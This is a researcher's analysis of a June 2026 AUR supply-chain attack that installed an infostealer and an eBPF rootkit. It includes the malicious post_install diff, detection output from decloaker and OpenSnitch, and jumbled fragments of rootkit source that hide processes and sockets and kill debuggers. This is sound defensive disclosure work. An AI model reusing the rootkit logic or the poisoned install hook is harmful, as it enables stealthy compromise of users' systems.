AUR malware (11/June/2026)

[gustavo-iniguez-goya]

It's only been 5 days since attackers started infecting AUR packages with an infostealer + rootkit, yet it feels like two weeks has already passed.

Context

On June 11, a number of malicious packages appeared in the AUR repository:

https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/

https://www.reddit.com/r/linux_gaming/comments/1u34pe3/alvr_aur_package_has_been_compromised/

https://www.reddit.com/r/linux/comments/1u3alhe/roughly_400_aur_packages_compromised/

https://www.virustotal.com/gui/file/6144d433f8a0316869877b5f834c801251bbb936e5f1577c5680878c7443c98b/detection

https://ioctl.fail/preliminary-analysis-of-aur-malware/

https://markdownpastebin.com/?id=d2a04939f1d7461ea0d36e438a49538c

Analyzing an infected machine with decloaker and OpenSnitch

When installing a malicious AUR package, it installs an additional npm package which contains the malware:

https://aur.archlinux.org/cgit/aur.git/commit/?h=forgecode-bin&id=1f8be77f62c64eeeeed5155cd94e2acc49524fac

diff --git a/forgecode-bin-deps.install b/forgecode-bin-deps.install
new file mode 100644
index 000000000000..a69b7e50b4a4
--- /dev/null
+++ b/[forgecode-bin-deps.install](https://aur.archlinux.org/cgit/aur.git/tree/forgecode-bin-deps.install?h=forgecode-bin&id=1f8be77f62c64eeeeed5155cd94e2acc49524fac)
@@ -0,0 +1,4 @@
+post_install() {{
+  cd /tmp
+  npm install atomic-lockfile glob ansi-colors
+}}

The malicious npm package in this case is atomic-lockfile. As soon as you install it, it'll execute the file src/hooks/deps from the package, copy it to another location (/var/lib, /home//.npm/, ...) and open an outbound connection to 1.1.1.1 or 8.8.8.8 on port 443 (image copied from a reddit thread):

If we use decloaker to look for suspicious processes, we'll see that it detects a process impersonating a kernel thread:

root@user1:/home/user1# ./decloaker2 scan suspicious-procs
[i] Looking for suspicious processes

WARNING (1458): Userspace process impersonating a kernel thread

	method: pattern
	exe: /home/user1/.npm/cricejo/cricejo
	comm: kworker/3:1-eve
	cmdline: kworker/3:1-events_freezable      
	hostname: user1
	UID: 1000
	GID: 1000
	PID: 1458
	PPID: 1458

With this information, you can copy, stop (kill -STOP) or kill the process.

Note

One interesting feature of this malware is that the name of the process (the cmdline) changes dynamically while it's running:

This malware also scans continuously for the running processes, collecting information about them:

8298   dbus-daemon        66   0 /proc
8298   dbus-daemon        68   0 /proc/1/cmdline
8298   dbus-daemon        68   0 /proc/2/cmdline
8298   dbus-daemon        68   0 /proc/3/cmdline
8298   dbus-daemon        68   0 /proc/4/cmdline
8298   dbus-daemon        68   0 /proc/5/cmdline
8298   dbus-daemon        68   0 /proc/6/cmdline

(...)

8298   kworker/u16:2      66   0 /proc/net/tcp
8298   kworker/u16:2      66   0 /proc/net/tcp6
8298   kworker/u16:2      66   0 /proc
8298   kworker/u16:2      67   0 /proc/1/fd
8298   kworker/u16:2      67   0 /proc/2/fd
8298   kworker/u16:2      67   0 /proc/3/fd
8298   kworker/u16:2      67   0 /proc/4/fd
8298   kworker/u16:2      67   0 /proc/5/fd
8298   kworker/u16:2      67   0 /proc/6/fd

(...)

8298   kworker/R-acpi_    66   0 /proc
8298   kworker/R-acpi_    67   0 /proc/1/comm
8298   kworker/R-acpi_    67   0 /proc/1/environ
8298   kworker/R-acpi_    67   0 /proc/2/comm
8298   kworker/R-acpi_    -1   3 /proc/2/environ
8298   kworker/R-acpi_    67   0 /proc/3/comm
8298   kworker/R-acpi_    -1   3 /proc/3/environ
8298   kworker/R-acpi_    67   0 /proc/4/comm

(...)

The eBPF rootkit

If the package is installed with root privileges, besides executing the deps binary, it'll load an eBPF rootkit (embedded inside the deps binary), which hides PIDs and connections:

root@xubuntu:/home/xubuntu# ./decloaker2 scan hidden-sockets --log-level=detection
[!] 1 HIDDEN connections found
LISTEN       39144    0                 8738   127.0.0.1                 0.0.0.0 0      8298     8298     xubuntu
    comm=kworker/R-inet_ exe=/var/lib/ticimi/ticimi
root@xubuntu:/home/xubuntu#

OpenSnitch can inspect some hidden PIDs, but you won't be able to analyze them with regular tools (ps, top, lsof, etc) because the rootkit hides them:

root@xubuntu:/home/xubuntu# ls -l /proc/|grep 8298
root@xubuntu:/home/xubuntu# 

root@xubuntu:/home/xubuntu# lsof -p 1|head -2
COMMAND PID USER  FD      TYPE             DEVICE SIZE/OFF       NODE NAME
systemd   1 root cwd       DIR               0,29      260          2 /
root@xubuntu:/home/xubuntu#

root@xubuntu:/home/xubuntu# lsof -p 8298
root@xubuntu:/home/xubuntu#

root@xubuntu:/home/xubuntu# top -b -n 1|grep 8298
root@xubuntu:/home/xubuntu# 

root@xubuntu:/home/xubuntu# pstree|grep 8298
root@xubuntu:/home/xubuntu#

After a few minutes running, the malware extracts and executes a Tor binary, used to exfiltrate the data:

root@xubuntu:/home/xubuntu# ls /var/lib/ticimi/bin/
dbus-daemon  libcrypto.so.3  libevent-2.1.so.7  libssl.so.3
root@xubuntu:/home/xubuntu# md5sum /var/lib/ticimi/bin/*
55033ac86d8983efb7610893b130c835  /var/lib/ticimi/bin/dbus-daemon
469c1329030d28894ce235c86cb704ea  /var/lib/ticimi/bin/libcrypto.so.3
76ecc59cf03a14776096ab705379dbb9  /var/lib/ticimi/bin/libevent-2.1.so.7
479886651ffa2d60edc5fa60febe6b19  /var/lib/ticimi/bin/libssl.so.3

Once extracted, it establishes connections every ~7 minutes to several Tor ips: https://www.virustotal.com/gui/ip-address/64.65.63.56

On the other hand, the process dbus-daemon is hidden by the rootkit. Since the rootkit exposes several paths under /sys/fs/bpf/<random_chars>, used to debug what processes it's hiding, we can inspect them:

root@xubuntu:/home/xubuntu# cat /sys/fs/bpf/3b731db6/hidden_pids
# WARNING!! The output is for debug purpose only
# WARNING!! The output format will change
8298: 1

root@xubuntu:/home/xubuntu# cat /sys/fs/bpf/3b731db6/hidden_names
# WARNING!! The output is for debug purpose only
# WARNING!! The output format will change
['d','b','u','s','-','d','a','e','m','o','n',]: 1

root@xubuntu:/home/xubuntu# cat /sys/fs/bpf/3b731db6/hidden_inodes
# WARNING!! The output is for debug purpose only
# WARNING!! The output format will change
39144: 1

or by using bpftool:

root@xubuntu:/home/xubuntu# bpftool map dump pinned /sys/fs/bpf/3b731db6/hidden_names
[{
        "key": "dbus-daemon",
        "value": 1
    }
 #]
root@xubuntu:/home/xubuntu# bpftool map dump pinned /sys/fs/bpf/3b731db6/hidden_inodes
[{  
        "key": 39144,
        "value": 1
    }
]

Source code of the eBPF rootkit

    tp/syscalls/sys_enter_getdents64
    /cloud/scales/agent/../ebpf/scales.bpf.c
    int enter_getdents(struct sys_enter_ctx *ctx)
        u64 id  = bpf_get_current_pid_tgid();
        u64 buf = (u64)ctx->args[1];
        bpf_map_update_elem(&scratch, &id, &buf, BPF_ANY);
        return 0;
    sys_exit_ctx
    long
    exit_getdents
    tp/syscalls/sys_exit_getdents64
    int exit_getdents(struct sys_exit_ctx *ctx)
        u64 id = bpf_get_current_pid_tgid();
        u64 *bufp = bpf_map_lookup_elem(&scratch, &id);
        if (!bufp) return 0;
        u64 buf = *bufp;
        bpf_map_delete_elem(&scratch, &id);
        long total = ctx->ret;
        if (total <= 0) return 0;
        struct dirent_ctx c = {
        bpf_loop(1024, walk_dirent, &c, 0);
    data
    walk_dirent
    .text
    static long walk_dirent(u32 i, void *data)
        if (c->off >= c->total)
        u16 rlen = 0;
                                (void *)(c->buf + c->off + 16)) < 0 || rlen == 0)
        if (bpf_probe_read_user(&rlen, sizeof(rlen),
        char name[16] = {};
        bpf_probe_read_user(name, sizeof(name), (void *)(c->buf + c->off + 19));
        u32 pid = name_to_pid(name);
        if (pid > 0 && pid_hidden(pid)) {
        return bpf_map_lookup_elem(&hidden_pids, &pid) != 0;
            if (c->prev_off >= 0) {
                u16 merged = c->prev_rlen + rlen;
                bpf_probe_write_user((void *)(c->buf + c->prev_off + 16),
                c->prev_rlen = merged;
            c->prev_off  = c->off;
            c->prev_rlen = rlen;
        c->off += rlen;
                long next_off = c->off + rlen;
                u16 next_rlen = 0;
                if (next_off < c->total &&
                        (void *)(c->buf + next_off + 16)) == 0 &&
                    bpf_probe_read_user(&next_rlen, 2,
                    bpf_probe_write_user((void *)(c->buf + c->off + 19), &zero, 1);
                    u8 zero = 0;
                    u64 next_ino  = 0;
                    u64 next_doff = 0;
                    u8  next_type = 0;
                    char next_name[16] = {};
                    bpf_probe_read_user(&next_ino,  8, (void *)(c->buf + next_off +  0));
                    bpf_probe_read_user(&next_doff, 8, (void *)(c->buf + next_off +  8));
                    bpf_probe_read_user(&next_type, 1, (void *)(c->buf + next_off + 18));
                                        (void *)(c->buf + next_off + 19));
                    bpf_probe_read_user(next_name, sizeof(next_name),
                    bpf_probe_write_user((void *)(c->buf + c->off +  0), &next_ino,  8);
                    bpf_probe_write_user((void *)(c->buf + c->off +  8), &next_doff, 8);
                    bpf_probe_write_user((void *)(c->buf + c->off + 18), &next_type, 1);
                    bpf_probe_write_user((void *)(c->buf + c->off + 19), next_name,
                    u16 merged = rlen + next_rlen;
                    bpf_probe_write_user((void *)(c->buf + c->off + 16), &merged, 2);
                    c->prev_off  = c->off;
                    c->prev_rlen = merged;
                    c->off      += next_rlen; // bottom adds rlen 
     total advance = rlen + next_rlen
    on_exec
    tp/sched/sched_process_exec
    int on_exec(void *ctx)
        bpf_get_current_comm(comm, sizeof(comm));
        if (!bpf_map_lookup_elem(&hidden_names, comm))
        u32 pid = (u32)(bpf_get_current_pid_tgid() >> 32);
        u8  val = 1;
        bpf_map_update_elem(&hidden_pids, &pid, &val, BPF_ANY);
    enter_ptrace
    tp/syscalls/sys_enter_ptrace
        long req = (long)ctx->args[0];
        if (req != PTRACE_ATTACH && req != PTRACE_SEIZE)
        u32 target = (u32)(unsigned long)ctx->args[1];
        if (pid_hidden(target))
            bpf_send_signal(9);
    net_enter_openat
    tp/syscalls/sys_enter_openat
        if (bpf_probe_read_user(pb, sizeof(pb), (void *)ctx->args[1]) < 0)
        if (pb[0]!='/' || pb[1]!='p' || pb[2]!='r' || pb[3]!='o' || pb[4]!='c' ||
        u8 val = 1;
        bpf_map_update_elem(&net_open_temp, &id, &val, BPF_ANY);
    net_exit_openat
    tp/syscalls/sys_exit_openat
    int net_exit_openat(struct sys_exit_ctx *ctx)
        if (!bpf_map_lookup_elem(&net_open_temp, &id)) return 0;
        bpf_map_delete_elem(&net_open_temp, &id);
        long fd = ctx->ret;
        if (fd < 0) return 0;
        u32 tgid = (u32)(id >> 32);
        u64 key  = ((u64)tgid << 32) | (u32)fd;
        bpf_map_update_elem(&net_fds, &key, &val, BPF_ANY);
    net_enter_read
    tp/syscalls/sys_enter_read
    int net_enter_read(struct sys_enter_ctx *ctx)
        u64 id   = bpf_get_current_pid_tgid();
        u64 key  = ((u64)tgid << 32) | fd;
        u32 fd   = (u32)(long)ctx->args[0];
        if (!bpf_map_lookup_elem(&net_fds, &key)) return 0;
        bpf_map_update_elem(&net_read_temp, &id, &buf, BPF_ANY);
    net_exit_read
    tp/syscalls/sys_exit_read
    int net_exit_read(struct sys_exit_ctx *ctx)
        u64 id    = bpf_get_current_pid_tgid();
        u64 *bufp = bpf_map_lookup_elem(&net_read_temp, &id);
        bpf_map_delete_elem(&net_read_temp, &id);
        long nbytes = ctx->ret;
        if (nbytes <= 0 || nbytes > 65535) return 0;
        struct net_scan_ctx c = {
        bpf_loop(65536, scan_net_byte, &c, 0);
        u32 wpos = c.wpos;
        if (wpos >= (u32)nbytes) return 0;
        struct net_zero_ctx zc = {
        bpf_loop((u32)nbytes - wpos, zero_net_tail, &zc, 0);
    scan_net_byte
    static long scan_net_byte(u32 i, void *data)
        if (i >= c->len) return 1;
        u32 wpos = c->wpos;
        if (wpos > i) return 1;  // wpos never exceeds rpos; bounds wpos for verifier
        u8 ch = 0;
        bpf_probe_read_user(&ch, 1, (void *)(c->buf + i));
        bpf_probe_write_user((void *)(c->buf + wpos), &ch, 1);
        if (ch == '\n') {
            int hide = c->inode_val != 0 &&
                       bpf_map_lookup_elem(&hidden_inodes, &c->inode_val) != NULL;
            if (hide) {
                c->wpos = c->line_wstart;
            } else {
            if (ch == ' ' || ch == '\t') {
                if (c->in_field) { c->field++; c->in_field = 0; }
                c->wpos = wpos + 1;
            c->inode_val   = 0;
            c->in_field    = 0;
            c->field       = 0;
            c->line_wstart = c->wpos;
                if (!c->in_field) c->in_field = 1;
                if (c->field == 9 && ch >= '0' && ch <= '9')
                    c->inode_val = c->inode_val * 10 + (ch - '0');
            c->wpos = wpos + 1;
    zero_net_tail
        u32 pos = c->start + i;
        if (pos >= c->end) return 1;
        u8 z = 0;
        bpf_probe_write_user((void *)(c->buf + pos), &z, 1);
    net_enter_close
    tp/syscalls/sys_enter_close
    int net_enter_close(struct sys_enter_ctx *ctx)
        bpf_map_delete_elem(&net_fds,  &key);
        bpf_map_delete_elem(&diag_fds, &key);
    enter_socket
    tp/syscalls/sys_enter_socket
        int domain   = (int)(long)ctx->args[0];
        if (domain != AF_NETLINK || protocol != NETLINK_SOCK_DIAG)
        bpf_map_update_elem(&sock_open_temp, &id, &val, BPF_ANY);
    exit_socket
    tp/syscalls/sys_exit_socket
    int exit_socket(struct sys_exit_ctx *ctx)
        if (!bpf_map_lookup_elem(&sock_open_temp, &id)) return 0;
        bpf_map_delete_elem(&sock_open_temp, &id);
        bpf_map_update_elem(&diag_fds, &key, &val, BPF_ANY);
    enter_recvmsg
    tp/syscalls/sys_enter_recvmsg
    int enter_recvmsg(struct sys_enter_ctx *ctx)
        if (!bpf_map_lookup_elem(&diag_fds, &key)) return 0;
        u64 msgp = (u64)ctx->args[1];  // struct msghdr *
        bpf_map_update_elem(&recvmsg_temp, &id, &msgp, BPF_ANY);
    exit_recvmsg
    tp/syscalls/sys_exit_recvmsg
    int exit_recvmsg(struct sys_exit_ctx *ctx)
        u64 id     = bpf_get_current_pid_tgid();
        u64 *msgpp = bpf_map_lookup_elem(&recvmsg_temp, &id);
        if (!msgpp) return 0;
        u64 msgp = *msgpp;
        bpf_map_delete_elem(&recvmsg_temp, &id);
        if (nbytes <= 0) return 0;
        u64 iov_ptr = 0;
        if (bpf_probe_read_user(&iov_ptr, 8, (void *)(msgp + 16)) < 0 || !iov_ptr)
        u64 buf = 0;
        if (bpf_probe_read_user(&buf, 8, (void *)iov_ptr) < 0 || !buf)
        struct diag_scan_ctx c = { .buf = buf, .len = nbytes, .off = 0 };
        bpf_loop(256, walk_nlmsg, &c, 0);
    walk_nlmsg
    static long walk_nlmsg(u32 i, void *data)
        if (c->off + 16 > c->len) return 1;
        u32 nlmsg_len  = 0;
        u16 nlmsg_type = 0;
        bpf_probe_read_user(&nlmsg_len,  4, (void *)(c->buf + c->off));
        bpf_probe_read_user(&nlmsg_type, 2, (void *)(c->buf + c->off + 4));
        if (nlmsg_len < 16 || nlmsg_type == NLMSG_DONE) return 1;
        if (nlmsg_type == SOCK_DIAG_BY_FAMILY &&
            c->off + IDIAG_INODE_OFF + 4 <= c->len) {
            u32 inode32 = 0;
            bpf_probe_read_user(&inode32, 4, (void *)(c->buf + c->off + IDIAG_INODE_OFF));
            u64 inode64 = inode32;
            if (inode64 && bpf_map_lookup_elem(&hidden_inodes, &inode64)) {
                u16 noop = NLMSG_NOOP;
                bpf_probe_write_user((void *)(c->buf + c->off + 4), &noop, 2);
        long aligned = ((long)nlmsg_len + 3) & ~3L;
        if (aligned < 16) return 1;
        c->off += aligned;
    name
    name_to_pid
    static __attribute__((noinline)) u32 name_to_pid(const char *name)
            u8 c = (u8)name[i];
            if (c == 0) break;
            if (c < '0' || c > '9') return 0;
            n = n * 10 + (c - '0');